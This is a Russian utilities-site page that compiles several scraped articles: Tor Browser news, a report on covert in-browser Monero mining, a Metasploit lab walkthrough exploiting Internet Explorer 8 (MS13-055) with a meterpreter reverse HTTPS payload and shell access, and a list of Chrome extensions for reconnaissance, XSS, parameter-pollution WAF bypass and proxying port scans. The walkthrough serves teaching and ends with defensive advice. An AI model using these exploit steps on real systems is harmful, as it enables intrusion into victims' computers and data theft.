Начальная

Windows Commander

Far
WinNavigator
Frigate
Norton Commander
WinNC
Dos Navigator
Servant Salamander
Turbo Browser

Winamp, Skins, Plugins
Необходимые Утилиты
Текстовые редакторы
Юмор

File managers and best utilites

16 расширений, которые превратят ваш браузер в хакерский инструмент. Хакерский браузер


Новый браузер Tor стал «непробиваемым» для хакеров и спецслужб

На фоне всей этой ситуации, когда власти многих стран мира активно борются с анонимностью в сети Интернет, был выпущен совершенно новый браузер Tor, который стал «непробиваемым» для хакеров и различных спецслужб, которые могли получить доступ к его более ранним версиям из-за определенных уязвимостей. По словам разработчиков, в новой версии они применили самые последние технологии и разработки, а также изменили способ маршрутизации, что собьет с толку абсолютно любого человека.

Так, в частности, новый веб-браузер Tor, обновленный сегодня, содержит в себе самые последние и новые криптографические алгоритмы, технологию улучшенной и более надежной авторизации, а также полностью переосмысленную маршрутизацию. Все эти особенности делают «луковые» адреса полностью зашифрованными и известными только пользователям, которые их посещают. Никто посторонний не сможет отследить, на какую страницу зашел пользователь и делал ли он это вообще.

Более ранние версии Tor, который были доступны до сегодняшнего дня, содержали в себе некоторые уязвимости перед хакерами и спецслужбами, что делало пользователей сервиса анонимного веб-серфинга The Tor Project беззащитными. Чаще всего, этот веб-браузер используют для обхода блокировок в сети Интернет, поскольку обозреватель позволяет выходить в сеть при сохранении полной анонимности. Скрывается и подменяется буквально все, начиная от IP-адреса и заканчивая местоположением.

Тем не менее, более ранние версии Tor из-за своей несовершенности были скомпилированы, то есть некоторым хакерам и спецслужбам удавалось получить доступ к защищенной информации. В новой версии самого защищенного в мире веб-браузера этого произойти не должно, поскольку его создатели предусмотрели абсолютно все способы получения информации и построили обновленный обозреватель таким образом, чтобы его было невозможно взломать.

Насколько все эти слова окажутся правдой – покажет время, а пока любой желающий может скачать новый браузер Tor с официального сайта разработчиков. Клиент доступен для компьютеров на базе операционных системы Windows, macOS и Linux, причем совершенно бесплатно.

Ранее сообщалось о том, что в России вступит в силу новый закон, который навсегда искоренит пиратство.

До 19 августа включительно у всех желающих есть уникальная возможность бесплатно получить спортивный браслет Xiaomi Mi Band 3, потратив на это всего 1 минуту своего личного времени.

Присоединяйтесь к нам в Twitter, Facebook, ВКонтакте, YouTube, Google+ и RSS чтобы быть в курсе последних новостей из мира технологий будущего.

akket.com

Вышел Tor Browser 4.5 - «Хакер»

Группа разработки Tor Browser с гордостью представила стабильный релиз 4.5. Его можно скачать со страницы проекта, а также из каталога с дистрибутивами.

По заявлению разработчиков, серия 4.5 обеспечивает значительные улучшения удобства, функционала, безопасности и защиты конфиденциальных данных. «Поскольку эти изменения настолько значительны, мы задержим автоматическое обновление пользователей с версии 4.0 на 4.5 на одну неделю», — пишут они.

С точки зрения юзабилити главное улучшение — увеличение скорости загрузки браузера под Windows и Linux. Во время первоначальной установки пользователям Windows теперь предлагают добавить Tor Browser в стартовое меню (установка по умолчанию), а Windows больше не ругается на «неизвестные источники» программного обеспечения. Под Linux теперь браузер поставляется с новой оболочкой, который позволяет запускать его из файл-менеджера, с рабочего стола, прямо из приложений или из командной строки.

Разработчики упростили главное меню Tor (зелёный лук) и конфигурационные подменю. Теперь в меню сразу показывают, через какую цепочку узлов ты подключаешься к сайту, и можно одним нажатием мыши сменить цепочку, если она не нравится.

OnionMenu

В целом, Tor Browser стал гораздо лучше обрабатывать смену цепочки подключения. Сайты не будут неожиданно изменять язык, внешний вид и даже сохранят твою сессию авторизации.

Важные изменения произошли в сфере безопасности. Главное из них — новый ползунок Security Slider, который постепенно отключает все потенциально небезопасные функции в браузере, такие как автоматический просмотр видео и аудио HTML5, оптимизация производительности JavaScript и т.д.

SecuritySlider

Нужно отметить ещё, что транспорт obfs2, obfs3 и ScrambleSuit переписали на GoLang, как и базовую поддержку нового транспорта obfs4, обладающего более продвинутыми возможностями по сопротивлению глубокой инспекции трафика и пробированию, что мешает автоматическому вредоносному сканированию на предмет мостов Tor.

Последнее значительное изменение — поисковой системой по умолчанию стала Disconnect.

xakep.ru

Майнить криптовалюту можно прямо через браузеры пользователей. Это уже делают Pirate Bay и хакеры

В минувшую субботу, 16 сентября 2017 года, пользователи одного из крупнейших торрент-трекеров сети, «непотопляемого» The Pirate Bay, обратили внимание, что при посещении некоторых страниц сайта нагрузка на процессор резко возрастает. Как выяснилось, причиной тому стал криптовалютный майнер, который встроили прямо в код сайта при помощи JavaScript.

При ближайшем рассмотрении оказалось, что майнер предоставлен сервисом Coinhive, который предлагает владельцам сайтов конвертировать мощности CPU посетителей в криптовалюту Monero. При этом майнер работал не на всех страницах ресурса. Журналисты Torrent Freak сообщают, что функцию активировали для страницы с результатами поиска и на страницах категорий, на главной странице сайта, а также страницах отдельных раздач майнер не работал.

Представители ресурса подтвердили Torrent Freak, что трекер не взломали. Администрация проводила кратковременные испытания (майнер проработал около 24 часов) новой модели монетизации.  По словам операторов The Pirate Bay, в будущем встроенный манер, вероятно, сможет полностью заменить собой обычную рекламу.

Блокировать такой майнер можно отключением Javascript, установкой соответственных расширений для браузера (к примеру, NoScript и ScriptBlock), а также через блокировщик рекламы, добавив URL в черный список (не самый надежный вариант, ведь адрес может меняться).

Проделать эти операции будет совсем не лишним, так как подобный способ монетизации за последнее время успел опробовать не только The Pirate Bay. В конце прошлой недели специалисты компании ESET зафиксировали ряд очень похожих кампаний: на страницах российских и украинских сайтов появилась вредоносная реклама, в тайне от пользователей использующая их браузеры для майнинга. На графиках ниже можно увидеть распределение кампаний по странам и конкретным сайтам.

В этом случае злоумышленники тоже используют JavaScript и модифицированную версию майнера MineCrunch, также известного как Web Miner. Этот скрипт был создан еще в 2014 году, специально для майнинга криптовалют через браузеры.

Так как работа майнера значительно влияет на производительность устройства, и не заметить происходящее сложно, майнинговую рекламу стараются внедрять на сайты с потоковым видео или браузерными играми. Такие ресурсы сами по себе заметно нагружают систему и потребляют ресурсы, так что пользователь может не заметить работающий на фоне манер. Более того, на таких сайтах пользователи проводят много времени, что сулит операторам адвари бОльшие прибыли.

Как работает эта схема

Аналитики ESET пишут, что им удалось обнаружить скрипты для майнинга Monero, Feathercoin и Litecoin, но Monero в настоящий момент является главным приоритетом для злоумышленников. Так, конфигурация Litecoin-майнера пуста, а в случае Feathercoin все настройки остались дефолтными, даже адрес в точности повторяет демонстрационную страницу с GitHub.

Также исследователи заметили похожую кампанию, но направленную на майнинг Zcash, которой, судя по всему, управляет другая хакерская группа. В этом случае для «доставки» майнера не используется вредоносная реклама, но JavaScript-код внедряется непосредственно на сами сайты (точно так же, как в случае The Pirate Bay).

Стоит сказать, что сами по себе майнеры для браузеров – не такое уж новое явление. К примеру, предлагающий такие услуги сервис Bitp.it появился еще в 2011 году, но в итоге был закрыт. Также в 2015 году генеральная прокуратура штата Нью-Джерси закрыла аналогичный ресурс Tidbit, предлагавший владельцам сайтов майнер, который будет эксплуатировать компьютеры посетителей. Тогда власти сочли такую деятельность нелегальной, сродни хакингу, ведь Tidbit не уведомлял пользователей о происходящем и не спрашивал их разрешения.

xakep.ru

Как взломать браузер через Метасплойт

В статье описывается пример как взломать браузер Internet Explorer 8 с устаревшей, однако, рабочей средой Java 6, являющийся интернет-обозревателем в ОС Windows 7. Это яркий пример того, как опасно пользоваться приложениями необновлённых версий.

Лаборатория.

  • Кали Линукс Rolling
  • Windows 7 c IE 8 и установленной версией Java 6
  • Вредоносный сайт с предлагаемым ПО для скачивания

Всем привет, сегодня рассмотрим пример того, как хакер получает доступ к вашему компьютеру благодаря вредоносной ссылке, размещённой на специально разработанном/поддельном/взломанном ресурсе или в присланном письме благодаря существующей уязвимости в связке IE8+Java. Облик вредоносного сайта в описании статьи не присутствует. Показано, как злоумышленник подготавливается к работе и как начинает сеанс с попавшейся на крючок жертвой.

Принцип атаки на браузер с помощью метасплойта, если коротко,  состоит в том, что хакером создаётся некий адрес URL, который несёт в себе вредоносный код. Код эксплойта направлен на конкретную уязвимость, и он будет специфичен для каждого из браузеров (что прокатило в Хроме, не прокатит в Опере) и зависит от их версий. Но в итоге стоит жертве лишь щёлкнуть по ссылке, начнётся работа эксплойта. Неважно, что жертва увидит на экране — вслед за исполнением эксплойта за дело примется приклеенный к эксплойту пэйлоуд, который потихонечку будет сдавать о вашей системе всё.

Взломать браузер. Подготовка ссылки.

Ну, конечная цель хакера — ваши данные, доступ к которым он получит как только вы перейдёте по его ссылке. Её содержание в описании должно вас привлечь, и как он это сделает — ваши проблемы. А вот как она создаётся.

Будет использован один из нескольких десятков эксплойтов против браузера Internet Explorer 8. Почему выбран он? В Windows 7 стоит по умолчанию, то есть идёт с установкой; несмотря на все окрики популярен в использовании и ко всему прочему весь в дырках. Возможностей подобраться к данным жертвы море, вы можете сами в этом убедиться с помощью команды в терминале (в Кали Линукс) на поиск интересного эксплойта против IE: searchsploit internet explorer 8

Терминал отобразит имеющиеся уязвимости во всех версиях, однако условия в выдаче будут подсвечены красным. Можете ознакомиться. Нас интересует та, которой присвоен номер MS13-055 (у нас IE 8):

Обратите внимание на команду поиска: возьмите на вооружение такую возможность поиска конкретного эксплойта.

Запускаем Метас. Находим по известному нам имени выбранный ранее эксплойт:

search name:MS13-055

Заряжаем эксплойт:

use exploit/windows/browser/ms13_055_canchor

После того, как эксплойт загружен, проверим информацию по нему:

info

В числе прочего указана информация и по целевой ОС, с которой эксплойт может работать. Выбираем Windows 7:

set target 2

В разделе info указано много полезной информации и если в английском вы не сильны, придётся опознавать необходимые для атаки опции по наитию. В данном примере я проведу вас по нужным.

Следующим из параметров хакеру нужно будет указать идентификатор ресурса URI — с ним будет связываться «заражённая» система. Если пропустить флаг, Метас сгенерирует его автоматически. И адрес ссылки, который будет отображаться в окне браузера по наведению по нему мышкой, будет непригляден, а потому назовём его hackit (позже вы его увидите уже в адресе):

set uripath hackit

Как взломать браузер. Выбор начинки.

Осталось простое: выбрать пэйлоуд. Конечно же, это будет возможность захвата контроля над системой через метерпретер. Выбираем традиционный в этих случаях (ривёрс годится только против конкретных машин, если попробуете атаковать оргпнизацию — сессия сразу прекратится):

set payload windows/meterpreter/reverse_https

Осталось проверить, что хакеру нужно указать перед созданием ссылки. Пошла команда:

show options

Большинство условий выполнено, но для корректной работы в условиях виртуальной машины нам нужно добавить некоторые значения для системы злоумышленника для пустых полей. Так, мы установим адрес:

set LHOST 192.168.0.100

где 192.168.0.100 — адрес Кали (сеть, как видите, виртуальная)

и порт:

set LPORT 443

Проверять повторно командой show options не будем. Связка эксплойта и пэйлоуда готовы. Хакер запускает сервер:

exploit -j

где флаг -j означает, что процесс будет запущен в рабочем режиме фоном. Условия здесь же:

msf exploit(ms13_055_canchor) > exploit -j [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://192.168.0.100:443 msf exploit(ms13_055_canchor) > [*] Using URL: http://0.0.0.0:8080/hackit [*] Local IP: http://192.168.0.100:8080/hackit [*] Server started.

Кали остаётся работать с запущенным сеансом, а хакер теперь размещает ссылку (http://192.168.0.100:8080/hackit) на любом ресурсе. Что будет сопровождаться в описании к ней, можно только догадаться.

Ка взломать браузер. Хакер ждёт жертву.

И вот пользователь щёлкает по ссылке:

Браузер Internet Explorer падает. Пользователь перезагружает окно, продолжая сеанс в любой другой открытой вкладке. Он может даже обидеться на IE и перейти к другой задаче. Неважно: хакер в системе:

Проверим открытые сессии на компьютере жертвы:

sessions -l Active sessions ===============   Id  Type                     Information  Connection   --  ----                     -----------  ----------   1   meterpreter x86/windows  1-_\1 @ 1-_  192.168.0.100:443 -> 192.168.0.101:49423 (192.168.0.101)

Выбираем эту сессию:

sessions -i 1

Ну что… Команда на получение шелл:

shell

Проверим директории системного диска командой dir. Сменим кодировку:

Делаем что хотим с помощью команд консоли cmd. Вот вам маленькая справка, какие команды cmd Windows понимает, как удалить процессы через cmd. И так далее.

Выводы

Как видите, изрядно поднаторев, хакер с помощью давно раскрытой уязвимости может собрать кучу жертв, используя одну лишь вредоносную ссылку. Как от него спрятаться?

  • обновления производителями ПО выпускаются не просто так: старайтесь их не пропускать
  • не стоит игнорировать предупреждения систем безопасности о посещении вредоносных ресурсов
  • остерегайтесь прямых и неизвестно откуда полученных ссылок по почте, непонятным ресурсам и баннерам. Вы сами видите, к чему это может привести.

Успехов нам всем.

Просмотров: 280

Похожее

computer76.ru

16 расширений, которые превратят ваш браузер в хакерский инструмент

В наше время для того, чтобы выполнять аудит и взаимодействовать с любыми удаленными сервисами уже не требуются какие-либо специальные «хакерские программы». Благодаря специальным расширениям современные браузеры позволяют заменить собой целый набор утилит, при этом совершенно не вызывая подозрений. В этой статье мы рассмотрим соответствующие дополнения для Chrome, однако их аналоги можно найти и для Firefox, и для Opera, и для других браузеров.

Важно! Выполнение аудита безопасности подразумевает получение предварительного согласия владельца ресурса и в большинстве случаев требует наличия лицензии. Без них можно тестировать только собственный сайт. Автор статьи и блог АЛЛО не несут ответственности за любой вред, причиненный необдуманным использованием описанных расширений.

 

IP Address and Domain Information

 

Перед тем, как совершить какую-либо операцию, важно все тщательно изучить и разведать. В этом нам поможет расширение сайта TCPIPutils.com. Расширение позволяет увидеть IP-адрес запрашиваемого ресурса, который может предоставить множество интересной информации о веб-странице, домене и о провайдере, на хостинге которого этот ресурс размещен. Удобно, что на отдельной вкладке можно посмотреть свой текущий адрес IP.

Установить расширение “IP Address and Domain Information” из магазина Chrome:

 

 

Shodan

 

Следующим этапом после просмотра записей из открытых баз официальных регистраторов является проверка сайта через теневой поисковик Shodan. Этот поисковик покажет владельца IP-адреса на карте, выдаст список открытых портов и сервисов на них, включая номер версии. Бесплатное расширение доступно как на сайте,так и в магазине Chrome.

Установить расширение “Shodan” из магазина Chrome:

 

 

Port Scanner

 

Еще больше узнать об открытых портах на удаленном узле и выяснить их состояние в данный момент может помочь расширение с незамысловатым названием Port Scanner. Автором расширения является программист из Индии Ашок Мунишвара. Находясь на одной странице, расширение позволяет сканировать сервер совершенно другой. Отдельными кнопками задается сканирование только открытых или наиболее уязвимых (часто используемых троянами) портов. Диапазон TCP-портов также задается вручную. Для удобства введенные адреса запоминаются — потом их можно выбрать из всплывающих подсказок по мере ввода.

Установить расширение “Port Scanner” из магазина Chrome:

 

 

Proxy SwitchyOmega

 

Сканирование портов со своего IP-адреса может оказаться не самой лучшей идеей. Многие серверы оснащаются продвинутыми брандмауэрами и системами предотвращения вторжения, которые могут отреагировать на опрос портов, как на начало атаки. После этого Ваш IP как минимум занесут в черный список (как максимум — Вас могут навестить и предложить ответить на пару вопросов). Избежать всего этого помогут анонимные прокси. Среди множества вариантов расширение Proxy SwitchyOmega (ранее известное как Proxy SwitchySharp) позволяет настроить все быстро и легко. Расширение устанавливается в два клика и после настройки работает по заданным параметрам в автоматическом режиме.

Установить расширение “Proxy SwitchyOmega” из магазина Chrome:

 

 

EditThisCookie

 

На сегодняшний день практически каждый сайт норовит присвоить Вашему компьютеру временный идентификатор, который сохраняется в куки вместе с другими демаскирующими Вас параметрами. С установкой расширения EditThisCookie у Вас появляется простая возможность управлять всеми «печеньками». Менеджер отображает только куки, относящиеся к активной веб-странице, поэтому их можно быстро находить без ручных фильтров, удалять, защищать от удаления, блокировать и даже править в отдельном окне.

Установить расширение “EditThisCookie” из магазина Chrome:

 

 

The Exploit Database

 

После того, как Вы собрали все разведданные о каком-либо сайте, следующим этапом станет поиск на нем уязвимостей. Расширение The Exploit Database предоставляет удобный доступ к большой постоянно обновляемой базе эксплоитов из архива Offensive Security. По умолчанию обновления проверяются каждые пять минут, а все новые уязвимости сортируются по дате, типу, автору и описанию. Установить расширение можно из магазина Chrome. Оно отлично работает в паре с приложением GHDB, о котором мы поговорим далее.

Установить расширение “The Exploit Database” из магазина Chrome:

 

 

GHDB (Google Hack Data Base)

 

GHDB (Google Hack Data Base) — это приложение для Chrome с быстрым запуском из панели. В нем собраны примеры хитрых запросов, которые позволяют быстро отыскать через Google сетевое оборудование и веб-платформы с известными уязвимостями. В отдельный раздел включены типовые запросы для систем видеонаблюдения, сетевых камер и принтеров. Также свой раздел получили процедуры поиска встроенных учетных записей и специфических ошибок. На двух последних вкладках собраны разные примеры — от поиска директорий с набором ценных данных до конфигурационных файлов Cisco PIX. Интересно, что Google спокойно позволяет установить GHDB прямо из собственного магазина.

Установить расширение “GHDB (Google Hack Data Base)” из магазина Chrome:

 

 

XSS Rays

 

Расширение XSS Rays является мощным инструментом для тестов на проникновение с использованием XSS-атак. Оно включает в себя сканер уязвимостей, инспектор скриптов, инжектор форм, менеджер событий, а также функции обратной разработки. Расширение может извлекать любые формы и даже позволяет редактировать их на лету, не меняя исходный объект. Умеет выполнять продвинутый поиск по ключевым словам, причем не только в теле HTML-страниц, но и в скриптах и внешних обработчиках событий. Расширение XSS Rays помогает разобраться в структуре сложных сайтов и понять, как происходит обработка любой отображаемой или скрытой формы.

Установить расширение “XSS Rays” из магазина Chrome:

 

 

HPP Finder

 

Расширение HPP Finder в незаметном режиме выполняет фоновую проверку сайта в активной вкладке. Оно ищет элементы веб-приложений, подверженных уязвимости HTTP Parameter Pollution. Во многих случаях атака по типу смешения границ параметров дает возможность обхода WAF и выполнения SQL-инжектов. Она работает там, где блокируются методы XSS. Подозрительные с точки зрения WAF запросы в таких элементах расщепляются на безобидные фрагменты, которые из-за особенностей обработки склеиваются в одну команду за счет использования одноименных параметров. HPP Finder использует метод, обнаруженный несколько лет назад, однако найденная уязвимость затрагивает фундаментальные недостатки RFC3986 и потому актуальна до сих пор.

Установить расширение “HPP Finder” из магазина Chrome:

 

 

Firebug Lite for Google Chrome

 

Firebug обеспечивает визуальный анализ исходного кода веб-страниц, таблиц CSS, скриптов и объектов DOM с возможностью исправлять содержимое каждой секции. При переходе по разным фрагментам кода соответствующие ему элементы страницы выделяются цветовой рамкой. Firebug помогает выяснить, как работает веб-приложение, а также провести его аудит. Это одно из немногих расширений, которое можно загрузить, но нельзя запустить на странице магазина Chrome из соображений безопасности.

Установить расширение “Firebug Lite for Google Chrome” из магазина Chrome:

 

 

d3coder

 

Часто при анализе содержимого веб-страниц и скриптов Вы можете увидеть данные в формате Base64, ROT13 или другой кодировке. Также может понадобиться перевести в читаемый вид временные метки из разных систем отсчета, раскодировать URI/URL или посчитать какой-нибудь хеш. Со всеми этими задачами поможет справиться расширение d3coder. Оно вызывается из контекстного меню и обладает хорошим набором функций, но его интерфейс еще далек от совершенства. Например, результаты работы расширения часто отображаются во всплывающем окне без возможности выделения и копирования.

Установить расширение “d3coder” из магазина Chrome:

 

 

Form Fuzzer

 

Form Fuzzer – это необычный инструмент для работы с формами любого типа, включая скрытые. Расширение автоматически наполняет их заданным текстом или случайным набором символов определенной длины, чтобы можно было проверить их дальнейшую обработку на сайте. Form Fuzzer умеет отмечать чекбоксы, переключать «радиокнопки» и проверять другие интерактивные функции веб-страницы, а также имеет множество настроек. Form Fuzzer часто используется для ускорения XSS-атак и SQL-инжектов, однако не смотря на это расширение можно свободно скачать в магазине Chrome.

Установить расширение “Form Fuzzer” из магазина Chrome:

 

 

Request Maker

 

Это расширение используется для отправки стандартных или измененных запросов на сервер и анализа ответных пакетов. Может применяться для подмены URL и модификации заголовков писем и поддерживает работу с формами. Также расширение может пригодиться для атаки на веб-приложения путем изменения HTTP-запросов. По умолчанию Request Maker запускается из меню «Дополнения» при нажатии кнопки «Параметры». Под каждым пунктом настроек расширения встроена мини-справка.

Установить расширение “Request Maker” из магазина Chrome:

 

 

iMacros for Chrome

 

Расширение iMacros экономит время, позволяя полностью автоматизировать рутинные операции. Например, если Вам часто приходится повторять одни и те же действия на разных страницах сайта, iMacros может записать их и воспроизводить с заданными настройками. В базе примеров уже есть типовые задачи, на которых можно легко создать собственные.

Установить расширение “iMacros for Chrome” из магазина Chrome:

 

 

Web Developer

 

Web Developer является очень удобным средством для быстрого изменения настроек. Расширение умеет в один клик активировать и отключать плагины, обработку JavaScript, вывод уведомлений и всплывающих окон. Web Developer имеет отдельные вкладки для управления cookies, CSS, интерактивными формами и загрузкой картинок. В разделе Tools содержится вьювер исходного кода веб-страниц и восемь инструментов валидации через внешние веб-сервисы, к которым можно добавить свои.

Установить расширение “Web Developer” из магазина Chrome:

 

 

Panic Button Plus

 

Хакер «со стажем» успевает уничтожить ноутбук еще до того, как его арестуют, такие кардинальные меры уже в прошлом. Иногда достаточно будет просто спрятать вкладки от коллег, оставив безобидную страницу Google. Сделать это при помощи всего одного клика поможет кнопка Panic. Повторная активация кнопки вернет все вкладки на свои места, поэтому не лишним будет добавить в настройках парольную защиту.

Установить расширение “Panic Button Plus” из магазина Chrome:

 

blog.allo.ua


 

..:::Новинки:::..

Windows Commander 5.11 Свежая версия.

Новая версия
IrfanView 3.75 (рус)

Обновление текстового редактора TextEd, уже 1.75a

System mechanic 3.7f
Новая версия

Обновление плагинов для WC, смотрим :-)

Весь Winamp
Посетите новый сайт.

WinRaR 3.00
Релиз уже здесь

PowerDesk 4.0 free
Просто - напросто сильный upgrade проводника.

..:::Счетчики:::..